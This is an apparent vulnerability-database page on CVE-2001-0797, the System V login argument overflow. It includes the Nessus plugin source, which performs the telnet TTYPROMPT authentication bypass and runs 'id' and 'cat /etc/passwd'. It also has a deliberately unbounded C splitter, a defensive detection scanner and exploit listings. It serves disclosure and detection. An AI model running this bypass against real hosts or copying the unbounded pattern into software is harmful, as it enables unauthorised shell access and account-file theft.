CVE-2001-0797 - Buffer Overflow vulnerability in Multiple Vendor System V Derived 'login'
Metric | Value |
---|---|
Attack vector | NETWORK |
Attack complexity | LOW |
Privileges required | NONE |
Confidentiality impact | COMPLETE |
Integrity impact | COMPLETE |
Availability impact | COMPLETE |
Summary
Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin. The overrun buffer is login's own argument array, so the authentication-bypass form used by the Nessus and Metasploit telnet checks on this page needs no shellcode: a user name followed by dozens of extra arguments is enough to reach a shell as that user without a password, while the SPARC/x86 exploits listed under Exploit-Db use the same overflow to run code as root. The Solaris telnet variant first sets the TTYPROMPT variable through the NEW-ENVIRON telnet option and only then sends the login line. Root itself is normally not reachable by the bypass because Solaris's default /etc/default/login CONSOLE setting refuses root logins from anything but the console, which is why the Nessus description says "any user (except root)". The fix is the vendor patch for login; disabling telnet and rlogin removes the network trigger, but the dialup module shows the flaw is reachable through any service that runs login.
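Constructed illustration of the defect class behind the summary, added for this page (it is not Sun's or any vendor's login source): a login line is split on whitespace into a fixed-size argument array, once without a bound check and once with one. The array size of 64 and the probe shape, a user name followed by 64 " c" tokens, are assumptions taken from the shape of the public checks rather than from this page.

```c
/*
 * Added illustration of the bug class (constructed for this page, not Sun's
 * or any vendor's login source): the login line is split into a fixed-size
 * argument array.  split_unbounded() never checks the bound, so a line with
 * more than MAX_ARGS tokens writes past the array; split_bounded() refuses it.
 * MAX_ARGS and the 64 extra " c" tokens are assumptions matching the shape of
 * the public probes, not values taken from this page.
 */
#include <stdio.h>
#include <string.h>

#define MAX_ARGS 64   /* assumed array size */

/* VULNERABLE PATTERN: no comparison of n against max.  With more than max
 * tokens this is an out-of-bounds write, so it is never called on the long
 * probe line here; it exists only to show the shape of the defect. */
int split_unbounded(char *line, char *argv[], int max)
{
    int n = 0;
    (void)max;                                   /* bound is ignored: the bug */
    for (char *tok = strtok(line, " \t\r\n"); tok; tok = strtok(NULL, " \t\r\n"))
        argv[n++] = tok;                          /* n may run past max */
    return n;
}

/* HARDENED: stop at the bound and report -1 instead of truncating silently,
 * so the caller rejects the login attempt rather than guessing. */
int split_bounded(char *line, char *argv[], int max)
{
    int n = 0;
    for (char *tok = strtok(line, " \t\r\n"); tok; tok = strtok(NULL, " \t\r\n")) {
        if (n >= max)
            return -1;                            /* too many arguments */
        argv[n++] = tok;
    }
    return n;
}

/* Build "user c c c ...\r\n" with `extra` " c" tokens (constructed probe). */
static void build_probe_line(char *buf, size_t bufsz, const char *user, int extra)
{
    size_t len = (size_t)snprintf(buf, bufsz, "%s", user);
    if (len >= bufsz) len = bufsz - 1;            /* user name was truncated */
    for (int i = 0; i < extra && len + 3 < bufsz; i++)
        len += (size_t)snprintf(buf + len, bufsz - len, " c");
    snprintf(buf + len, bufsz - len, "\r\n");
}

/* What the hardened splitter reports for a probe line: the token count, or
 * -1 when the line carries more than MAX_ARGS tokens. */
int probe_result(const char *user, int extra)
{
    char line[1024];
    char *argv[MAX_ARGS];
    build_probe_line(line, sizeof line, user, extra);
    return split_bounded(line, argv, MAX_ARGS);
}

int main(void)
{
    char small[] = "bin\r\n";
    char *argv[MAX_ARGS];
    printf("unbounded splitter on a normal line -> %d args\n", split_unbounded(small, argv, MAX_ARGS));
    printf("bounded splitter, 63 extra args     -> %d args\n", probe_result("bin", 63));
    printf("bounded splitter, 64 extra args     -> %d (rejected)\n", probe_result("bin", 64));
    return 0;
}
```

The hardened splitter returns an error rather than silently keeping the first 64 tokens: silent truncation would still let the attacker's extra arguments decide which slots get filled, and a login line with dozens of arguments has no legitimate use, so rejecting it outright is the safer contract.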
Vulnerable Configurations
Part | Description | Count |
---|---|---|
OS | 5 | |
OS | 8 | |
OS | 5 | |
OS | 8 | |
OS | 17 | |
Exploit-Db
All nine entries are remote exploits for this CVE; the modified date of each equals its published date.
EDB-ID | Title | Platform | Reporter | Published | Last seen | Source |
---|---|---|---|---|---|---|
21180 | Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability | solaris | Marco Ivaldi | 2004-12-04 | 2016-02-02 | https://www.exploit-db.com/download/21180/ |
57 | Solaris 2.6/7/8 TTYPROMPT in.telnet Remote Authentication Bypass | solaris | Jonathan S. | 2002-11-02 | 2016-01-31 | https://www.exploit-db.com/download/57/ |
21179 | Solaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability | solaris | snooq | 2003-01-09 | 2016-02-02 | https://www.exploit-db.com/download/21179/ |
16928 | System V Derived /bin/login Extraneous Arguments Buffer Overflow | linux | metasploit | 2010-07-03 | 2016-02-02 | https://www.exploit-db.com/download/16928/ |
9917 | Solaris in.telnetd TTYPROMPT - Buffer Overflow | solaris | MC | 2002-01-18 | 2016-02-01 | https://www.exploit-db.com/download/9917/ |
716 | Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit SPARC | solaris | Marco Ivaldi | 2004-12-24 | 2016-01-31 | https://www.exploit-db.com/download/716/ |
10036 | System V Derived /bin/login Extraneous Arguments Buffer Overflow modem based | solaris | I)ruid | 2001-12-12 | 2016-02-01 | https://www.exploit-db.com/download/10036/ |
16327 | Solaris in.telnetd TTYPROMPT Buffer Overflow | solaris | metasploit | 2010-06-22 | 2016-02-01 | https://www.exploit-db.com/download/16327/ |
346 | Solaris /bin/login Remote Root Exploit SPARC/x86 | linux | Teso | 2001-12-20 | 2016-01-31 | https://www.exploit-db.com/download/346/ |
Metasploit
- MSF:EXPLOIT/SOLARIS/TELNET/TTYPROMPT, Solaris in.telnetd TTYPROMPT Buffer Overflow. This module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon. Published 2006-01-31, modified 2017-07-24, last seen 2019-12-29. Reporter: Rapid7. References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0797. Source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/telnet/ttyprompt.rb
- MSF:EXPLOIT/DIALUP/MULTI/LOGIN/MANYARGS, System V Derived /bin/login Extraneous Arguments Buffer Overflow. This exploit connects to a system's modem over dialup and exploits a buffer overflow vulnerability in its System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments. Published 2009-06-29, modified 2017-08-29, last seen 2019-12-29. Reporter: Rapid7. Source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/dialup/multi/login/manyargs.rb
Nessus
Field | Value |
---|---|
NASL family | Gain a shell remotely |
NASL id | TTYPROMPT.NASL |
plugin id | 11136 |
title | Multiple OS /bin/login Remote Overflow |
published | 2002-10-03 |
modified | 2020-06-02 |
last seen | 2020-06-01 |
reporter | This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/11136 |
description | The remote implementation of the /bin/login utility, used when authenticating a user via telnet or rsh contains an overflow which allows an attacker to gain a shell on this host, without even sending a shell code. An attacker may use this flaw to log in as any user (except root) on the remote host. |

Plugin source, with the original line breaks restored. Comments beginning "# note:" are editorial and are not part of Tenable's script.

```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(11136);
  script_version("1.27");
  script_cvs_date("Date: 2018/08/01 17:36:12");

  script_cve_id("CVE-2001-0797");
  script_bugtraq_id(3681, 5848);
  script_xref(name:"CERT-CC", value:"CA-2001-34");

  script_name(english:"Multiple OS /bin/login Remote Overflow");
  script_summary(english:"Attempts to log into the remote host");

  script_set_attribute(attribute:"synopsis", value:"It is possible to execute arbitrary commands on the remote host.");
  script_set_attribute(attribute:"description", value:
"The remote implementation of the /bin/login utility, used when
authenticating a user via telnet or rsh contains an overflow which
allows an attacker to gain a shell on this host, without even sending
a shell code.

An attacker may use this flaw to log in as any user (except root) on
the remote host.");
  script_set_attribute(attribute:"solution", value:"Contact the vendor for a patch.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Solaris in.telnetd TTYPROMPT Buffer Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  script_set_attribute(attribute:"vuln_publication_date", value:"2001/12/12");
  script_set_attribute(attribute:"plugin_publication_date", value:"2002/10/03");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # It might cause problem on some systems
  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Gain a shell remotely");
  script_dependencie("find_service1.nasl");
  script_require_ports("Services/telnet", 23);
  exit(0);
}

include("data_protection.inc");

global_var soc;

function init()
{
  local_var c, i, lim, r, s;

  # note: telnet option negotiation. Every option is refused (WONT/DONT)
  # except NEW-ENVIRON (0x27), which the plugin offers with WILL (0xFB).
  send(socket:soc, data:raw_string(
    0xFF, 252, 0x25,
    0xFF, 254, 0x26,
    0xFF, 252, 0x26,
    0xFF, 254, 0x03,
    0xFF, 252, 0x18,
    0xFF, 252, 0x1F,
    0xFF, 252, 0x20,
    0xFF, 252, 0x21,
    0xFF, 252, 0x22,
    0xFF, 0xFB, 0x27,
    0xFF, 254, 0x05,
    0xFF, 252, 0x23));
  r = recv(socket:soc, length:30);
  lim = strlen(r);

  # note: answer each 3-byte option request from the server with the
  # matching refusal (WILL/WONT -> DONT, DO/DONT -> WONT), NEW-ENVIRON excepted.
  for(i=0;i<lim - 2;i=i+3)
  {
    if(!(ord(r[i+2]) == 0x27))
    {
      if(ord(r[i+1]) == 251) c = 254;
      if(ord(r[i+1]) == 252) c = 254;
      if(ord(r[i+1]) == 253) c = 252;
      if(ord(r[i+1]) == 254) c = 252;
      s = raw_string(ord(r[i]), c, ord(r[i+2]));
      send(socket:soc, data:s);
    }
  }

  send(socket:soc, data:raw_string(0xFF, 0xFC, 0x24));
  r = recv(socket:soc, length:300);

  # note: NEW-ENVIRON subnegotiation:
  # IAC SB NEW-ENVIRON IS USERVAR "TTYPROMPT" VALUE "abcdef" IAC SE
  send(socket:soc, data:raw_string(0xFF, 0xFA, 0x27, 0x00, 0x03,
    0x54, 0x54, 0x59, 0x50, 0x52, 0x4F, 0x4D, 0x50, 0x54,
    0x01, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66,
    0xFF, 0xF0));
}

port = get_kb_item("Services/telnet");
if(!port)port = 23;
if(!get_port_state(port))exit(0);

soc = open_sock_tcp(port);
if(soc)
{
  buf = init();
  # note: the trigger itself: a user name followed by many extra arguments
  send(socket:soc, data:string("bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\r\n"));
  r = recv(socket:soc, length:4096);
  if(!r)exit(0);
  # note: if the bypass worked the next read is a shell prompt; confirm with id
  send(socket:soc, data:string("id\r\n"));
  r = recv(socket:soc, length:1024);
  if("uid=" >< r)
  {
    send(socket:soc, data:string("cat /etc/passwd\r\n"));
    r = recv(socket:soc, length:4096);
    r = data_protection::redact_etc_passwd(output:r);
    report = string("Here is the output of the command 'cat /etc/passwd' :\n", r);
    security_hole(port:port, extra:report);
  }
}
```
Field | Value |
---|---|
NASL family | Gain a shell remotely |
NASL id | BINLOGIN_OVERFLOW_TELNET.NASL |
plugin id | 10827 |
title | SysV /bin/login Environment Remote Overflow (telnet check) |
published | 2001-12-15 |
modified | 2020-06-02 |
last seen | 2020-06-01 |
reporter | This script is Copyright (C) 2001-2018 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/10827 |
description | The remote /bin/login seems to crash when it receives too many environment variables. This is likely due to a buffer overflow vulnerability which might allow an attacker to execute arbitrary code on the remote host. |

Field | Value |
---|---|
NASL family | Gain a shell remotely |
NASL id | BINLOGIN_OVERFLOW_RLOGIN.NASL |
plugin id | 10828 |
title | SysV /bin/login Environment Remote Overflow (rlogin) |
published | 2001-12-15 |
modified | 2020-06-02 |
last seen | 2020-06-01 |
reporter | This script is Copyright (C) 2001-2018 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/10828 |
description | The remote /bin/login seems to crash when it receives too many environment variables. This is likely due to a buffer overflow vulnerability which might allow an attacker to execute arbitrary code on the remote host. |
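A detection-side view of the probe the TTYPROMPT.NASL plugin above performs, as an added example written for this page (it is not the plugin's, Metasploit's or any vendor's code). The client negotiates options, sends one NEW-ENVIRON subnegotiation defining TTYPROMPT, then the login line; the scanner below parses NEW-ENVIRON as RFC 1572 lays it out (IS/INFO, VAR/USERVAR, VALUE, ESC, IAC IAC) and counts the arguments on the line that follows. The sample capture is constructed inline, the variable value "abcdef" mirrors the plugin's bytes, and the 64 extra " c" tokens are an assumption matching the shape of the public probes, not a value taken from this page.

```c
/* Added detection example for the TTYPROMPT probe: not the Nessus plugin's,
 * Metasploit's or any vendor's code.  Scans client->server telnet bytes for a
 * NEW-ENVIRON SB (RFC 1572) defining TTYPROMPT, then counts login-line arguments. */
#include <stdint.h>
#include <string.h>

#define IAC 0xFF
#define SB  0xFA
#define SE  0xF0
#define NEW_ENVIRON 0x27   /* telnet option 39 */
#define ENV_VAR     0x00
#define ENV_VALUE   0x01
#define ENV_ESC     0x02
#define ENV_USERVAR 0x03

struct env_hit { char value[64]; size_t end; };   /* end: offset just past IAC SE */
/* Find the first NEW-ENVIRON SB defining `want` as VAR or USERVAR.
 * Returns 1 and fills *hit, or 0 when absent or malformed. */
int find_new_environ_var(const uint8_t *buf, size_t n, const char *want, struct env_hit *hit)
{
    for (size_t i = 0; i + 3 < n; i++) {
        if (buf[i] != IAC || buf[i+1] != SB || buf[i+2] != NEW_ENVIRON) continue;
        size_t j = i + 4;                           /* skip IAC SB NEW-ENVIRON and IS/INFO */
        char name[32] = {0}, value[64] = {0};
        size_t nl = 0, vl = 0;
        int have = 0, in_value = 0, found = 0, closed = 0;
        while (j < n) {
            uint8_t b = buf[j++];
            int literal = 0;
            if (b == IAC) {
                if (j >= n) return 0;
                if (buf[j] == SE) { j++; closed = 1; break; }
                if (buf[j] != IAC) return 0;        /* IAC x inside an SB: malformed */
                j++; literal = 1;                    /* IAC IAC is one data byte 0xFF */
            } else if (b == ENV_ESC) {
                if (j >= n) return 0;
                b = buf[j++]; literal = 1;           /* ESC: next byte is data */
            }
            if (!literal && (b == ENV_VAR || b == ENV_USERVAR)) {
                if (have && !found && strcmp(name, want) == 0) { strcpy(hit->value, value); found = 1; }
                nl = vl = 0; name[0] = value[0] = '\0'; have = 1; in_value = 0;
            } else if (!literal && b == ENV_VALUE) {
                in_value = 1;
            } else if (!have) {
                return 0;                            /* data before any variable name */
            } else if (in_value) {
                if (vl + 1 < sizeof value) { value[vl++] = (char)b; value[vl] = '\0'; }
            } else {
                if (nl + 1 < sizeof name) { name[nl++] = (char)b; name[nl] = '\0'; }
            }
        }
        if (!closed) return 0;                       /* capture ends inside the SB */
        if (have && !found && strcmp(name, want) == 0) { strcpy(hit->value, value); found = 1; }
        if (found) { hit->end = j; return 1; }
        i = j - 1;                                   /* resume after this SB */
    }
    return 0;
}

/* Tokens on the login line after `start`; skips 3-byte IAC negotiations, stops at CR/LF. */
int count_login_args(const uint8_t *buf, size_t n, size_t start)
{
    int count = 0, in_tok = 0;
    for (size_t i = start; i < n; i++) {
        if (buf[i] == IAC) { i += 2; continue; }
        if (buf[i] == '\r' || buf[i] == '\n') break;
        if (buf[i] == ' ' || buf[i] == '\t') in_tok = 0;
        else if (!in_tok) { in_tok = 1; count++; }
    }
    return count;
}

/* Constructed client-side capture: option refusals, NEW-ENVIRON `var`=abcdef, "bin" + `extra` " c". */
size_t build_sample_capture(uint8_t *out, size_t outsz, const char *var, int extra)
{
    static const uint8_t head[] = { IAC, 0xFC, 0x25, IAC, 0xFE, 0x26, IAC, 0xFB, NEW_ENVIRON,
                                    IAC, SB, NEW_ENVIRON, 0x00 /* IS */, ENV_USERVAR };
    static const uint8_t tail[] = { ENV_VALUE, 'a', 'b', 'c', 'd', 'e', 'f', IAC, SE };
    size_t vlen = strlen(var), len = 0;
    if (extra < 0 || outsz < sizeof head + vlen + sizeof tail + 3 + 2 * (size_t)extra + 2) return 0;
    memcpy(out + len, head, sizeof head); len += sizeof head;
    memcpy(out + len, var, vlen);         len += vlen;
    memcpy(out + len, tail, sizeof tail); len += sizeof tail;
    memcpy(out + len, "bin", 3);          len += 3;
    for (int k = 0; k < extra; k++) { out[len++] = ' '; out[len++] = 'c'; }
    out[len++] = '\r'; out[len++] = '\n';
    return len;
}

/* Login-line argument count when the capture set TTYPROMPT, else 0.  The rlogin and
 * dialup variants on this page do not use TTYPROMPT; for those count_login_args() alone applies. */
int ttyprompt_probe_args(const char *var, int extra)
{
    uint8_t cap[512];
    struct env_hit hit;
    size_t n = build_sample_capture(cap, sizeof cap, var, extra);
    if (n == 0 || !find_new_environ_var(cap, n, "TTYPROMPT", &hit)) return 0;
    return count_login_args(cap, n, hit.end);
}
```

ttyprompt_probe_args("TTYPROMPT", 64) returns 65 (the user name plus 64 extra tokens) and ttyprompt_probe_args("TERM", 64) returns 0 because no TTYPROMPT was set. Run the scanner over reassembled client-to-server bytes only: a NEW-ENVIRON subnegotiation can be split across TCP segments, and find_new_environ_var() deliberately reports a truncated SB as malformed rather than guessing.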
Oval
Field | Value |
---|---|
accepted | 2005-02-23T09:25:00.000-04:00 |
class | vulnerability |
contributors | |
description | Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin. |
family | unix |
id | oval:org.mitre.oval:def:2025 |
status | accepted |
submitted | 2004-12-29T12:00:00.000-04:00 |
title | System V login Buffer Overflow |
version | 35 |
Packetstorm
- PACKETSTORM:82329, Solaris in.telnetd TTYPROMPT Buffer Overflow. Reporter: MC. Published 2009-10-28, last seen 2016-12-05. Data source: https://packetstormsecurity.com/files/download/82329/ttyprompt.rb.txt. Source: https://packetstormsecurity.com/files/82329/Solaris-in.telnetd-TTYPROMPT-Buffer-Overflow.html
- PACKETSTORM:82226, System V Derived /bin/login Extraneous Arguments Buffer Overflow. Reporter: I)ruid. Published 2009-10-27, last seen 2016-12-05. Data source: https://packetstormsecurity.com/files/download/82226/manyargs.rb.txt. Source: https://packetstormsecurity.com/files/82226/System-V-Derived-bin-login-Extraneous-Arguments-Buffer-Overflow.html
Saint
bid | 3681 |
description | System V login argument array buffer overflow |
id | shell_loginbo |
osvdb | 690 |
title | systemv_login |
type | remote |
Seebug
- SSV:62958, Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC). Bulletin family: exploit. No description provided by source. Reporter: Root. Published 2014-07-01, modified 2014-07-01, last seen 2017-11-19. Source: https://www.seebug.org/vuldb/ssvid-62958
- SSV:75016, Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability. Bulletin family: exploit. No description provided by source. Reporter: Root. Published 2014-07-01, modified 2014-07-01, last seen 2017-11-19. Source: https://www.seebug.org/vuldb/ssvid-75016
- SSV:8658, Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC). Bulletin family: exploit. No description provided by source. Reporter: Root. Published 2008-06-05, modified 2008-06-05, last seen 2017-11-19. Source: https://www.seebug.org/vuldb/ssvid-8658
References
- ftp://patches.sgi.com/support/free/security/advisories/20011201-01-I
- ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.40/CSSA-2001-SCO.40.txt
- http://marc.info/?l=bugtraq&m=100844757228307&w=2
- http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/213
- http://www.cert.org/advisories/CA-2001-34.html
- http://www.kb.cert.org/vuls/id/569272
- http://www.securityfocus.com/archive/1/246487
- http://www.securityfocus.com/bid/3681
- http://www-1.ibm.com/support/search.wss?rs=0&q=IY26221&apar=only
- http://xforce.iss.net/alerts/advise105.php
- https://exchange.xforce.ibmcloud.com/vulnerabilities/7284
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2025